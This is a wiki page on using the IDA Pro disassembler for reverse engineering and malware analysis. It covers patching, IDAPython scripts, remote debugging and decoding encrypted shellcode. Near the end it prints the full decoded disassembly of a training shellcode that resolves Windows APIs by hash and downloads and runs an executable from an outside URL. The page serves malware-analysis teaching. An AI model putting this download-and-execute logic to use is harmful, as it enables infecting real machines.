IDA-Pro

From aldeid

Description and installation

Description

IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger.

Installation

Flavors

Recommended installation

It is recommended to install Python 2.7 first and then IDA Pro to avoid errors with PySide.QtGui.

Usage

Display opcodes

If you want to display opcodes along with the assembly, go to Options > General and fill in the "Number of opcode bytes" as follows:

Here is the result once the option is applied:

Patching

Patch code from IDA

Warning
Before you patch the file, make sure you have a copy of the initial file so that you can compare or roll back.

You can patch an executable from IDA Pro directly. Go to the location you want to patch, right click and make sure Hex view is synchronized:

From the IDA View, click on the instruction to modify and go to the Hex view. Right click on the byte to modify and select "Edit" from the menu:

Make your modification, right click on the byte and select "Commit changes" or press F2.

Now, go to File > Produce File > Create DIF file:

Download idadif.py (http://stalkr.net/files/ida/idadif.py) and run it as follows:

C:\tools>idadif.py e7bc5d2c0cf4480348f5504196561297.patched.2 e7bc5d2c0cf4480348f5504196561297.patched.dif
Patching file 'e7bc5d2c0cf4480348f5504196561297.patched.2' with 'e7bc5d2c0cf4480348f5504196561297.patched.dif'
Done
Note
You can also use ida_patcher.c (http://www.idabook.com/chapter14/ida_patcher.c) from the IDA Book, but you will need to compile it.

You can check the differences using the fc utility:

C:\tools>fc /b e7bc5d2c0cf4480348f5504196561297.init e7bc5d2c0cf4480348f5504196561297.patched.2
Comparing files e7bc5d2c0cf4480348f5504196561297.init and E7BC5D2C0CF4480348F5504196561297.PATCHED.2
0001F21C: 74 EB

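The above output means that, at file offset 0x0001F21C, the byte 0x74 has been replaced by 0xEB. 0x74 is the opcode of a short JZ and 0xEB that of a short JMP, so this patch most likely turns a conditional jump into an unconditional one.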
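If idadif.py is not at hand, the patching step can be approximated in a few lines of Python. This is a minimal sketch and not the idadif.py source: it assumes every DIF record has the form OFFSET: OLD NEW in hexadecimal (the same layout as the fc output above), and the helper names parse_dif and apply_dif are hypothetical.

```python
import re

# One DIF record looks like "0001F21C: 74 EB" (offset: original byte, patched byte).
DIF_LINE = re.compile(r"^([0-9A-Fa-f]+):\s+([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})$")

def parse_dif(text):
    """Return a list of (offset, old_byte, new_byte) tuples found in DIF text."""
    records = []
    for line in text.splitlines():
        match = DIF_LINE.match(line.strip())
        if match:  # header and file-name lines do not match and are skipped
            records.append(tuple(int(group, 16) for group in match.groups()))
    return records

def apply_dif(data, records):
    """Patch a bytearray in place, refusing to touch unexpected bytes."""
    for offset, old, new in records:
        if data[offset] != old:
            raise ValueError("unexpected byte at offset 0x%X" % offset)
        data[offset] = new
    return data

# Tiny in-memory example: turn 74 (JZ short) into EB (JMP short) at offset 2.
sample = bytearray(b"\x90\x90\x74\x05")
apply_dif(sample, parse_dif("00000002: 74 EB"))
```

Checking the original byte before writing is a design choice: it stops the patch from being applied to the wrong file or applied twice.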

NOPing out instructions

The Python script below NOPs out the instruction under the cursor in IDA Pro and binds itself to the Alt+N key combination. It uses the legacy (pre-7.0) IDAPython function names.

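import idaapi
from idc import *   # ScreenEA, NextHead, PatchByte, Jump, Refresh, AddHotkey

def nopIt():
    start = ScreenEA()              # address of the instruction under the cursor
    end = NextHead(start)           # address of the next instruction
    for ea in range(start, end):    # overwrite every byte of the instruction
        PatchByte(ea, 0x90)         # 0x90 = NOP
    Jump(end)                       # move the cursor to the next instruction
    Refresh()

# Bind Alt+N to nopIt() through a small IDC wrapper
idaapi.CompileLine('static n_key() { RunPythonStatement("nopIt()"); }')
AddHotkey("Alt-N", "n_key")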
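The same idea can be tried outside IDA on a raw byte buffer. This is a minimal sketch, not an IDAPython script: nop_range is a hypothetical helper, and 0x90 is the single-byte x86 NOP opcode used by the script above.

```python
NOP = 0x90  # single-byte x86 NOP opcode

def nop_range(buf, start, end):
    """Overwrite buf[start:end] with NOPs in place and return the byte count."""
    if not 0 <= start <= end <= len(buf):
        raise ValueError("range outside buffer")
    for offset in range(start, end):
        buf[offset] = NOP
    return end - start

# Example: neutralize a two-byte short jump to itself (EB FE) inside a buffer.
code = bytearray(b"\x55\xEB\xFE\xC3")
nop_range(code, 1, 3)
```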

Given the below extract, we see at location 0x401215 a jump to itself:

Place the cursor at offset 0x401215 and press D to convert the block to DATA. Then place the cursor at location 0x401216 and press C to convert the block to CODE.

You should now have the below screen.

Place your cursor at offset 0x401215, start the python script (File > Script file...). Press Alt+N to NOP out the byte.

So that IDA Pro displays the function properly, press C to convert the byte to CODE:

Remote debugger

Description

There are situations where the IDA remote debugger is useful (e.g. debugging an ELF that runs on a remote Linux host from IDA Pro installed on a Windows virtual machine).

linux_serverx64

Server part

To do that, go to your IDA installation folder and find the appropriate debugger that will run on the remote server:

   File name        Target system      Debugged programs
------------------  -----------------  -----------------
android_server      ARM Android        32-bit ELF files
armlinux_server     ARM Linux          32-bit ELF files
armuclinux_server   ARM UCLinux        32-bit ELF files
linux_server        Linux 32-bit       32-bit ELF files
linux_serverx64     Linux 64-bit       64-bit ELF files
mac_server          Mac OS X           32-bit Mach-O files
mac_serverx64       Mac OS X           64-bit Mach-O files
win32_remote.exe    MS Windows 32-bit  32-bit PE files
win64_remotex64.exe MS Windows 64-bit  64-bit PE files
wince_remote.dll    Windows CE         32-bit PE files

In our case, we will debug a 64-bit ELF. Hence, we copy linux_serverx64 to the remote host. Once done, start it as follows:

$ ./linux_serverx64 -PmyAwesomePassword
IDA Linux 64-bit remote debug server(ST) v1.14. Hex-Rays (c) 2004-2011
Listening on port #23946...

Available options are:

  • -p<port>: port number (default: 23946/tcp)
  • -P<password>: password
  • -v: verbose
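Before configuring the client, it can help to confirm that the debug server port is reachable from the analysis machine. The sketch below uses only the Python standard library; port_is_open is a hypothetical helper, and any host address you pass to it is your own remote server.

```python
import socket

DEFAULT_IDA_PORT = 23946  # default port reported by linux_serverx64 above

def port_is_open(host, port=DEFAULT_IDA_PORT, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        conn = socket.create_connection((host, port), timeout)
    except socket.error:  # refused, unreachable or timed out
        return False
    conn.close()
    return True
```

A False result usually points to a firewall rule, a wrong -p value, or a server that is not running, which is quicker to diagnose here than from the IDA dialog.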

Client configuration

Now, let's open IDA Pro and go to Debugger > Run > Remote Linux debugger:

And configure the screen as follows:

You should see the following screen:

Usual commands for debugging:

  • F9: run
  • F2: breakpoint
  • g: go to offset
  • F7: step in
  • F8: step over

android_server

Refer to this page.

Fix function stack

There are cases where IDA fails to determine the size of a variable and you need to fix the stack. In the below example, IDA did not realize that the size of the buffer is 512 bytes and displayed a local variable labeled var_20C instead:

To fix that, press Ctrl + K or go to Edit > Functions > Stack variables, right click on the first byte of buffer and select "array" from the menu:

Enter 512 in the Array size field and click OK.

Stack before change
Stack after change

Once this modification is applied, go back to the IDA View: the buffer is now properly labeled:

Add a standard structure

Example 1: IWebBrowser2

There are cases where you will need to add a standard structure. In the below example, we see a call to CoCreateInstance at offset 0x401022:

clsid is Internet Explorer (see details) and riid corresponds to the IWebBrowser2 interface:

But if we want to know what function is called, we have to add the structure. To do that, go to the Structures tab and press the Insert key. When prompted, enter the structure name, based on the following pattern: InterfaceNameVtbl, where InterfaceName is IWebBrowser2 in our case.

In the below code extract, we can see that the reference to the COM object is stored on the stack and moved to EAX at offset 0x40105C. EAX is dereferenced at 0x401065 and EDX points to the beginning of the COM object.

To know what function is called at 0x401074, right click on the offset (0x2C). It appears that it corresponds to the Navigate function:
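The offset-to-method mapping can also be worked out by hand: in a 32-bit process each vtable slot is a 4-byte pointer, so offset 0x2C is slot 11. The sketch below lists the leading IWebBrowser2 vtable slots (IUnknown, then IDispatch, then the first IWebBrowser methods); the declaration order is an assumption to be checked against the IWebBrowser2Vtbl structure that IDA imports, and method_at is a hypothetical helper.

```python
POINTER_SIZE = 4  # 32-bit process: each vtable slot holds a 4-byte pointer

# Leading IWebBrowser2 vtable slots (assumed declaration order).
IWEBBROWSER2_SLOTS = [
    "QueryInterface", "AddRef", "Release",                         # IUnknown
    "GetTypeInfoCount", "GetTypeInfo", "GetIDsOfNames", "Invoke",  # IDispatch
    "GoBack", "GoForward", "GoHome", "GoSearch", "Navigate",       # IWebBrowser
]

def method_at(offset, slots=IWEBBROWSER2_SLOTS, pointer_size=POINTER_SIZE):
    """Map a byte offset into the vtable to the method name stored there."""
    index, remainder = divmod(offset, pointer_size)
    if remainder or not 0 <= index < len(slots):
        raise ValueError("offset 0x%X is not a known slot" % offset)
    return slots[index]

print(method_at(0x2C))  # slot 0x2C // 4 = 11
```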

Example 2: AT_INFO

In the following example (Lab 09-03 from the Practical Malware Analysis book), we have to deal with the AT_INFO structure in the DLL3.dll file:

In DLL3.dll, go to the Structures window, press the Insert key, and add the AT_INFO structure:

The DLL3GetStructure function returns a pointer to the dword_1000B0A0 global variable which is defined in DllMain:

Go to dword_1000B0A0 in memory, select Edit > Struct var... from the menu, and select the AT_INFO structure previously added:

Back to DllMain, the code is now much more readable:

Load with manual Image base address

Manual load

In case you're analyzing a DLL that has been rebased, you will need to manually load the DLL into IDA Pro. To do that, ensure the Manual load option is checked when you're loading the DLL:

You're then prompted to enter the new address:

Rebasing

If the malware is already opened in IDA Pro, you can rebase it by going to Edit > Segments > Rebase program... and specifying a new address. Below is an example of a malicious driver we want to rebase. The default image base is 0x10000, but we know the driver is loaded at address 0xf7be9000. Let's modify the window as follows:

Before
After
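Rebasing is a constant shift: every address moves by the difference between the new and the old image base. A minimal sketch using the two bases from the example above (the helper name rebase and the sample address 0x10486 are illustrative assumptions):

```python
OLD_BASE = 0x10000      # default image base shown by IDA
NEW_BASE = 0xF7BE9000   # address where the driver is actually loaded

def rebase(address, old_base=OLD_BASE, new_base=NEW_BASE):
    """Translate an address from the old image base to the new one."""
    return address - old_base + new_base

print(hex(rebase(0x10486)))  # 0x486 bytes into the image, relative to the new base
```

Swapping the two base arguments converts an address seen in a kernel debugger back to the one IDA showed before rebasing.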

Graphing of several functions

To make a graph of several functions, select the functions or a portion of code and select the desired graph type (from, to, ...). Below is an example. Suppose we want to highlight the relationship between WinINet functions. Let's select several functions and click "Xref Graph to".

Add missing cross references

There are situations where IDA Pro won't be able to detect all cross references (e.g. function pointers). To add missing cross references, use the IDC function AddCodeXref (also available from IDAPython through the idc module):

AddCodeXref(loc_from, loc_to, flow_type);

The three parameters are:

  • the location the reference is from
  • the location the reference is to
  • flow type: fl_CF (normal call instruction) or fl_JF (jump instruction)

Convert bytes to DWORDs

We have just decrypted a shellcode in IDA Pro and defined the decrypted stub as CODE (C). However, some bytes at the end of the code are actually DWORDs. They correspond to shellcode function hashes, as explained here:

To convert these bytes, let's first define them as individual arrays with a size of 4 (press * on the numpad or right click and select Array):

Once this is done, press D repeatedly on each of these arrays until it is displayed as dd, which converts it to a DWORD:
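What the dd conversion shows can be reproduced with the struct module: four consecutive bytes are read as one little-endian 32-bit value. The sketch assumes x86 (little-endian) data; the sample bytes 8E 4E 0E EC and 98 FE 8A 0E are taken from two push instructions in the Lab19-01 listing further down this page, and to_dwords is a hypothetical helper.

```python
import struct

def to_dwords(raw):
    """Split raw bytes into little-endian 32-bit unsigned integers."""
    raw = bytes(bytearray(raw))
    if len(raw) % 4:
        raise ValueError("length must be a multiple of 4")
    return list(struct.unpack("<%dI" % (len(raw) // 4), raw))

hashes = to_dwords([0x8E, 0x4E, 0x0E, 0xEC, 0x98, 0xFE, 0x8A, 0x0E])
print(["0x%08X" % h for h in hashes])  # ['0xEC0E4E8E', '0x0E8AFE98']
```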

Plugins

IDA Python Scripting

List of IDC functions

The complete list of IDC functions can be found here.

setcolorssiko.py

You can use the following python script to highlight:

  • Function calls
  • Non-zeroing XORs (data encoding)
  • sidt, sldt, sgdt, smsw, str, in, cpuid (Anti-VM instructions)
  • int 3, int 2D, icebp, rdtsc (Anti-Debugging instructions)
  • push/ret combinations (return address abuse)

The script is also available here.

from idautils import *
from idc import *

#Color the Calls off-white
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
funcCalls = []
for i in heads:
    if GetMnem(i) == "call":
        funcCalls.append(i)
print "Number of calls: %d" % (len(funcCalls))
for i in funcCalls:
    SetColor(i, CIC_ITEM, 0xc7fdff)
#Color Anti-VM instructions Red and print their location
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
antiVM = []
for i in heads:
    if GetMnem(i) in ("sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"):
        antiVM.append(i)
print "Number of potential Anti-VM instructions: %d" % (len(antiVM))
for i in antiVM:
    print "Anti-VM potential at %x" % i
    SetColor(i, CIC_ITEM, 0x0000ff)
#Color non-zeroing out xor instructions Orange
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
xor = []
for i in heads:
    if GetMnem(i) == "xor":
        if (GetOpnd(i,0) != GetOpnd(i,1)):
            xor.append(i)
print "Number of xor: %d" % (len(xor))
for i in xor:
    SetColor(i, CIC_ITEM, 0x00a5ff)
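The tests the script performs can be isolated from IDA as a plain function, which makes them easier to extend and to check. The sketch below is a rewrite under assumptions, not part of setcolorssiko.py: classify is a hypothetical helper that receives a mnemonic and its operand strings (as GetMnem and GetOpnd would return them), and the anti-debugging set follows the bullet list above. The int 3 / int 2D case needs an operand check and push/ret pairs need two consecutive instructions, so both are left out.

```python
ANTI_VM = {"sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"}
ANTI_DEBUG = {"icebp", "rdtsc"}  # int 3 / int 2D are omitted in this sketch

def classify(mnemonic, op1="", op2=""):
    """Return a category name for one instruction, or None if uninteresting."""
    if mnemonic == "call":
        return "call"
    if mnemonic in ANTI_VM:
        return "anti-vm"
    if mnemonic in ANTI_DEBUG:
        return "anti-debug"
    # xor reg, reg only zeroes a register; differing operands may be encoding.
    if mnemonic == "xor" and op1 != op2:
        return "non-zeroing-xor"
    return None
```

Inside IDA, the returned category could be mapped to a color and passed to SetColor, as the script above does for each list.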

Decode XOR strings

You can use Python scripts to decode strings (e.g. XOR'ed) in IDA. Here is an extract of a shellcode that decodes a XOR'ed stub:

To decode the XOR'ed stub, we have to patch each byte by XOR'ing with 0x66. To do that, we can use a custom python script as follows:

# decode-xor.py
loc = 0x18FD68                       # Start address of the XOR'ed stub
for i in range(0x1DF):               # 0x1DF bytes: offsets 0x000-0x1DE
    b = Byte(loc+i)                  # Read the encoded byte
    decoded_byte = b ^ 0x66          # XOR byte with 0x66
    PatchByte(loc+i, decoded_byte)   # Patch the byte with its decoded value

Go to File > Script file... and select decode-xor.py.

IDA will update your code as follows:

You can select the entire block and press the A key to display the string:
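Outside IDA, the same single-byte XOR decoding can be checked on a raw buffer. A minimal sketch, assuming the 0x66 key used above; xor_decode is a hypothetical helper and the sample string is made up for illustration:

```python
def xor_decode(data, key=0x66):
    """Return a copy of data with every byte XOR'ed with the single-byte key."""
    return bytes(bytearray(b ^ key for b in bytearray(data)))

# XOR is its own inverse, so the same function both encodes and decodes.
encoded = xor_decode(b"cmd.exe")
decoded = xor_decode(encoded)
```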

Decode shellcode

Description

Given the Lab19-01.bin shellcode from the Practical Malware Analysis book, let's see how we can decode the encrypted part with a Python script.

First of all, we need to identify the shellcode sections:

Section         Address range
--------------  -----------------------
NOP sled        0x00000000 - 0x000001FF
Decoding stub   0x00000200 - 0x00000223
Encrypted stub  0x00000224 - 0x000003B0

For more information regarding the identification of the sections, refer to this section.

The decryption routine is relatively simple to understand:

seg000:00000200 33 C9                                   xor     ecx, ecx
seg000:00000202 66 B9 8D 01                             mov     cx, 18Dh        ; Size of encrypted stub
seg000:00000206 EB 17                                   jmp     short loc_21F
seg000:00000208
seg000:00000208                         ; =============== S U B R O U T I N E =======================================
seg000:00000208
seg000:00000208
seg000:00000208                         decode_shellcode proc near
seg000:00000208 5E                                      pop     esi             ; used as CALL/POP to get address of EIP
seg000:00000209 56                                      push    esi             ; push EIP to stack to pass control to decrypted content via retn
seg000:0000020A 8B FE                                   mov     edi, esi
seg000:0000020C
seg000:0000020C                         loc_20C:                                ; loop thru all bytes of encrypted stub
seg000:0000020C AC                                      lodsb                   ; 1st character transform
seg000:0000020D 8A D0                                   mov     dl, al
seg000:0000020F 80 EA 41                                sub     dl, 41h ; 'A'   ; subtract 0x41
seg000:00000212 C0 E2 04                                shl     dl, 4           ; and shift left by 4
seg000:00000215 AC                                      lodsb                   ; 2nd character transform
seg000:00000216 2C 41                                   sub     al, 41h ; 'A'   ; subtract 0x41
seg000:00000218 02 C2                                   add     al, dl          ; sum of both transformations
seg000:0000021A AA                                      stosb                   ; patch byte with result of transformation
seg000:0000021B 49                                      dec     ecx
seg000:0000021C 75 EE                                   jnz     short loc_20C   ; end of loop
seg000:0000021E C3                                      retn
seg000:0000021E                         decode_shellcode endp
seg000:0000021E
seg000:0000021F                         ; ---------------------------------------------------------------------------
seg000:0000021F
seg000:0000021F                         loc_21F:                                ; CODE XREF: seg000:00000206↑j
seg000:0000021F E8 E4 FF FF FF                          call    decode_shellcode

Once the sections have been identified and the decryption routine is understood, we can write a Python script that decodes the bytes exactly as the shellcode would at run time.

Script

def shl(dest, count):
	# emulate an 8-bit SHL: bits shifted past bit 7 are discarded
	return (dest << count) & 0xFF

def transform_pair(c1, c2):
	# subtract 0x41 from the 1st character and shift it left by 4
	c1 = shl(c1 - 0x41, 4)
	# subtract 0x41 from the 2nd character
	c2 = c2 - 0x41
	# return the sum of both transforms, truncated to one byte like AL
	return (c1 + c2) & 0xFF

# Start of the encrypted stub
loc = 0x00000224

# Loop over each decoded byte; each one is built from two encoded bytes
for i in range(0x18D):
	b1 = Byte(loc+i*2)
	b2 = Byte(loc+i*2+1)
	decoded_byte = transform_pair(b1, b2)
	PatchByte(loc+i, decoded_byte)
	SetColor(loc+i, CIC_ITEM, 0xF8FFB0)

Launch the script from File > Script file....
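The decoding logic can also be exercised without IDA, which is handy for checking it against a few known bytes. The sketch below mirrors the stub's arithmetic on a plain buffer; decode_pairs and encode_pairs are hypothetical helpers, and encode_pairs is only an assumed inverse added to make a round trip possible.

```python
def decode_pairs(encoded):
    """Decode two-characters-per-byte data the way the Lab19-01 stub does."""
    encoded = bytearray(encoded)
    if len(encoded) % 2:
        raise ValueError("encoded data must have an even length")
    out = bytearray()
    for i in range(0, len(encoded), 2):
        high = ((encoded[i] - 0x41) << 4) & 0xFF   # sub dl, 41h / shl dl, 4
        low = (encoded[i + 1] - 0x41) & 0xFF       # sub al, 41h
        out.append((high + low) & 0xFF)            # add al, dl
    return bytes(out)

def encode_pairs(raw):
    """Assumed inverse: each byte becomes two letters in the range 'A'..'P'."""
    out = bytearray()
    for b in bytearray(raw):
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)

# "IJ" decodes to 0x89 and "OF" to 0xE5, i.e. the bytes of "mov ebp, esp".
first_bytes = decode_pairs(b"IJOF")
```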

Arrange code/data

Now, we still need to manually arrange the code, using:

  • U for undefined,
  • D for data,
  • C for code,
  • A for ascii.

Below is the result of the fully decoded shellcode:

seg000:00000224 89 E5                                   mov     ebp, esp
seg000:00000226 81 EC 40 00 00 00                       sub     esp, 40h
seg000:0000022C E9 33 01 00 00                          jmp     loc_364
seg000:00000231
seg000:00000231                         ; =============== S U B R O U T I N E =======================================
seg000:00000231
seg000:00000231
seg000:00000231                         sub_231         proc near               ; CODE XREF: sub_252+1F↓p
seg000:00000231
seg000:00000231                         arg_0           = dword ptr  4
seg000:00000231
seg000:00000231 56                                      push    esi
seg000:00000232 57                                      push    edi
seg000:00000233 8B 74 24 0C                             mov     esi, [esp+8+arg_0]
seg000:00000237 31 FF                                   xor     edi, edi
seg000:00000239 FC                                      cld
seg000:0000023A
seg000:0000023A                         loc_23A:                                ; CODE XREF: sub_231+15↓j
seg000:0000023A 31 C0                                   xor     eax, eax
seg000:0000023C AC                                      lodsb
seg000:0000023D 38 E0                                   cmp     al, ah
seg000:0000023F 74 0A                                   jz      short loc_24B
seg000:00000241 C1 CF 0D                                ror     edi, 0Dh
seg000:00000244 01 C7                                   add     edi, eax
seg000:00000246 E9 EF FF FF FF                          jmp     loc_23A
seg000:0000024B                         ; ---------------------------------------------------------------------------
seg000:0000024B
seg000:0000024B                         loc_24B:                                ; CODE XREF: sub_231+E↑j
seg000:0000024B 89 F8                                   mov     eax, edi
seg000:0000024D 5F                                      pop     edi
seg000:0000024E 5E                                      pop     esi
seg000:0000024F C2 04 00                                retn    4
seg000:0000024F                         sub_231         endp
seg000:0000024F
seg000:00000252
seg000:00000252                         ; =============== S U B R O U T I N E =======================================
seg000:00000252
seg000:00000252
seg000:00000252                         sub_252         proc near               ; CODE XREF: sub_2BF+E↓p
seg000:00000252                                                                 ; sub_2BF+1C↓p ...
seg000:00000252
seg000:00000252                         var_4           = dword ptr -4
seg000:00000252                         arg_0           = dword ptr  4
seg000:00000252                         arg_4           = dword ptr  8
seg000:00000252
seg000:00000252 60                                      pusha
seg000:00000253 8B 6C 24 24                             mov     ebp, [esp+20h+arg_0]
seg000:00000257 8B 45 3C                                mov     eax, [ebp+3Ch]
seg000:0000025A 8B 54 05 78                             mov     edx, [ebp+eax+78h]
seg000:0000025E 01 EA                                   add     edx, ebp
seg000:00000260 8B 4A 18                                mov     ecx, [edx+18h]
seg000:00000263 8B 5A 20                                mov     ebx, [edx+20h]
seg000:00000266 01 EB                                   add     ebx, ebp
seg000:00000268
seg000:00000268                         loc_268:                                ; CODE XREF: sub_252+28↓j
seg000:00000268 E3 2A                                   jecxz   short loc_294
seg000:0000026A 49                                      dec     ecx
seg000:0000026B 8B 34 8B                                mov     esi, [ebx+ecx*4]
seg000:0000026E 01 EE                                   add     esi, ebp
seg000:00000270 56                                      push    esi
seg000:00000271 E8 BB FF FF FF                          call    sub_231
seg000:00000276 3B 44 24 28                             cmp     eax, [esp+20h+arg_4]
seg000:0000027A 75 EC                                   jnz     short loc_268
seg000:0000027C 8B 5A 24                                mov     ebx, [edx+24h]
seg000:0000027F 01 EB                                   add     ebx, ebp
seg000:00000281 66 8B 0C 4B                             mov     cx, [ebx+ecx*2]
seg000:00000285 8B 5A 1C                                mov     ebx, [edx+1Ch]
seg000:00000288 01 EB                                   add     ebx, ebp
seg000:0000028A 8B 04 8B                                mov     eax, [ebx+ecx*4]
seg000:0000028D 01 E8                                   add     eax, ebp
seg000:0000028F E9 02 00 00 00                          jmp     loc_296
seg000:00000294                         ; ---------------------------------------------------------------------------
seg000:00000294
seg000:00000294                         loc_294:                                ; CODE XREF: sub_252:loc_268↑j
seg000:00000294 31 C0                                   xor     eax, eax
seg000:00000296
seg000:00000296                         loc_296:                                ; CODE XREF: sub_252+3D↑j
seg000:00000296 89 44 24 1C                             mov     [esp+20h+var_4], eax
seg000:0000029A 61                                      popa
seg000:0000029B C2 08 00                                retn    8
seg000:0000029B                         sub_252         endp
seg000:0000029B
seg000:0000029E
seg000:0000029E                         ; =============== S U B R O U T I N E =======================================
seg000:0000029E
seg000:0000029E
seg000:0000029E                         sub_29E         proc near               ; CODE XREF: sub_2BF+1↓p
seg000:0000029E 56                                      push    esi
seg000:0000029F 31 C0                                   xor     eax, eax
seg000:000002A1 64 8B 40 30                             mov     eax, fs:[eax+30h]
seg000:000002A5 85 C0                                   test    eax, eax
seg000:000002A7 78 0F                                   js      short loc_2B8
seg000:000002A9 8B 40 0C                                mov     eax, [eax+0Ch]
seg000:000002AC 8B 70 1C                                mov     esi, [eax+1Ch]
seg000:000002AF AD                                      lodsd
seg000:000002B0 8B 40 08                                mov     eax, [eax+8]
seg000:000002B3 E9 05 00 00 00                          jmp     loc_2BD
seg000:000002B8                         ; ---------------------------------------------------------------------------
seg000:000002B8
seg000:000002B8                         loc_2B8:                                ; CODE XREF: sub_29E+9↑j
seg000:000002B8                                                                 ; sub_29E:loc_2B8↓j
seg000:000002B8 E9 FB FF FF FF                          jmp     loc_2B8
seg000:000002BD                         ; ---------------------------------------------------------------------------
seg000:000002BD
seg000:000002BD                         loc_2BD:                                ; CODE XREF: sub_29E+15�j
seg000:000002BD 5E                                      pop     esi
seg000:000002BE C3                                      retn
seg000:000002BE                         sub_29E         endp
seg000:000002BE
seg000:000002BF
seg000:000002BF                         ; =============== S U B R O U T I N E =======================================
seg000:000002BF
seg000:000002BF
seg000:000002BF                         sub_2BF         proc near               ; CODE XREF: sub_2BF:loc_364↓p
seg000:000002BF 5B                                      pop     ebx
seg000:000002C0 E8 D9 FF FF FF                          call    sub_29E
seg000:000002C5 89 C2                                   mov     edx, eax
seg000:000002C7 68 8E 4E 0E EC                          push    0EC0E4E8Eh
seg000:000002CC 52                                      push    edx
seg000:000002CD E8 80 FF FF FF                          call    sub_252
seg000:000002D2 89 45 FC                                mov     [ebp-4], eax
seg000:000002D5 68 C1 79 E5 B8                          push    0B8E579C1h
seg000:000002DA 52                                      push    edx
seg000:000002DB E8 72 FF FF FF                          call    sub_252
seg000:000002E0 89 45 F8                                mov     [ebp-8], eax
seg000:000002E3 68 83 B9 B5 78                          push    78B5B983h
seg000:000002E8 52                                      push    edx
seg000:000002E9 E8 64 FF FF FF                          call    sub_252
seg000:000002EE 89 45 F4                                mov     [ebp-0Ch], eax
seg000:000002F1 68 E6 17 8F 7B                          push    7B8F17E6h
seg000:000002F6 52                                      push    edx
seg000:000002F7 E8 56 FF FF FF                          call    sub_252
seg000:000002FC 89 45 F0                                mov     [ebp-10h], eax
seg000:000002FF 68 98 FE 8A 0E                          push    0E8AFE98h
seg000:00000304 52                                      push    edx
seg000:00000305 E8 48 FF FF FF                          call    sub_252
seg000:0000030A 89 45 EC                                mov     [ebp-14h], eax
seg000:0000030D 8D 03                                   lea     eax, [ebx]
seg000:0000030F 50                                      push    eax
seg000:00000310 FF 55 FC                                call    dword ptr [ebp-4]
seg000:00000313 68 36 1A 2F 70                          push    702F1A36h
seg000:00000318 50                                      push    eax
seg000:00000319 E8 34 FF FF FF                          call    sub_252
seg000:0000031E 89 45 E8                                mov     [ebp-18h], eax
seg000:00000321 68 80 00 00 00                          push    80h ; 'Ç'
seg000:00000326 8D 7B 48                                lea     edi, [ebx+48h]
seg000:00000329 57                                      push    edi
seg000:0000032A FF 55 F8                                call    dword ptr [ebp-8]
seg000:0000032D 01 C7                                   add     edi, eax
seg000:0000032F C7 07 5C 31 2E 65                       mov     dword ptr [edi], 652E315Ch
seg000:00000335 C7 47 04 78 65 00 00                    mov     dword ptr [edi+4], 6578h
seg000:0000033C 31 C9                                   xor     ecx, ecx
seg000:0000033E 51                                      push    ecx
seg000:0000033F 51                                      push    ecx
seg000:00000340 8D 43 48                                lea     eax, [ebx+48h]
seg000:00000343 50                                      push    eax
seg000:00000344 8D 43 07                                lea     eax, [ebx+7]
seg000:00000347 50                                      push    eax
seg000:00000348 51                                      push    ecx
seg000:00000349 FF 55 E8                                call    dword ptr [ebp-18h]
seg000:0000034C 68 05 00 00 00                          push    5
seg000:00000351 8D 43 48                                lea     eax, [ebx+48h]
seg000:00000354 50                                      push    eax
seg000:00000355 FF 55 EC                                call    dword ptr [ebp-14h]
seg000:00000358 FF 55 F0                                call    dword ptr [ebp-10h]
seg000:0000035B 68 00 00 00 00                          push    0
seg000:00000360 50                                      push    eax
seg000:00000361 FF 55 F4                                call    dword ptr [ebp-0Ch]
seg000:00000364
seg000:00000364                         loc_364:                                ; CODE XREF: seg000:0000022C↑j
seg000:00000364 E8 56 FF FF FF                          call    sub_2BF
seg000:00000364                         sub_2BF         endp ; sp-analysis failed
seg000:00000364
seg000:00000364                         ; ---------------------------------------------------------------------------
seg000:00000369 55 52 4C 4D 4F 4E 00    aUrlmon         db 'URLMON',0
seg000:00000370 68 74 74 70 3A 2F 2F 77+aHttpWww_practi db 'http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe',0
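The routine sub_231 in the listing above is a rotate-right-by-13 additive hash: for each character of a NUL-terminated name it executes ror edi, 0Dh followed by add edi, eax. The sketch below reimplements that loop so the constants pushed before each call to sub_252 can be matched against API names. The helper names are hypothetical, and the candidate names in the usage lines are guesses to be confirmed against the listing's constants.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    """Hash an ASCII name as sub_231 does (the terminating NUL is not hashed)."""
    h = 0
    for ch in bytearray(name.encode("ascii")):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h

# Candidate export names to compare with the pushed constants.
for candidate in ("LoadLibraryA", "WinExec"):
    print("%-14s 0x%08X" % (candidate, ror13_hash(candidate)))
```

With these two candidates the results match the constants 0EC0E4E8Eh and 0E8AFE98h pushed at 0x2C7 and 0x2FF, which suggests the shellcode resolves LoadLibraryA and WinExec.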

Convert bytes to IP address

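The following script reads the four bytes that follow the byte under the cursor (note the +1 offset) and adds them, formatted as a dotted-quad IP address, as a comment at the current position: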

# Convert to IP address
loc = ScreenEA()
MakeComm(loc, '.'.join([str(Byte(loc+i+1)) for i in range(4)]))
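The formatting step itself does not depend on IDA. A minimal sketch on a plain byte string; bytes_to_ip is a hypothetical helper and the sample address is made up for illustration:

```python
def bytes_to_ip(raw):
    """Format exactly four bytes as a dotted-quad IPv4 string."""
    octets = bytearray(raw)
    if len(octets) != 4:
        raise ValueError("an IPv4 address needs exactly 4 bytes")
    return ".".join(str(octet) for octet in octets)

print(bytes_to_ip(b"\xc0\xa8\x01\x0a"))  # 192.168.1.10
```

The bytes are taken in memory order, which matches an address stored in network byte order, as the IDA script above also assumes.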

Below is an example:



Keywords: IDA-Pro reverse-engineering disassembler malware-analysis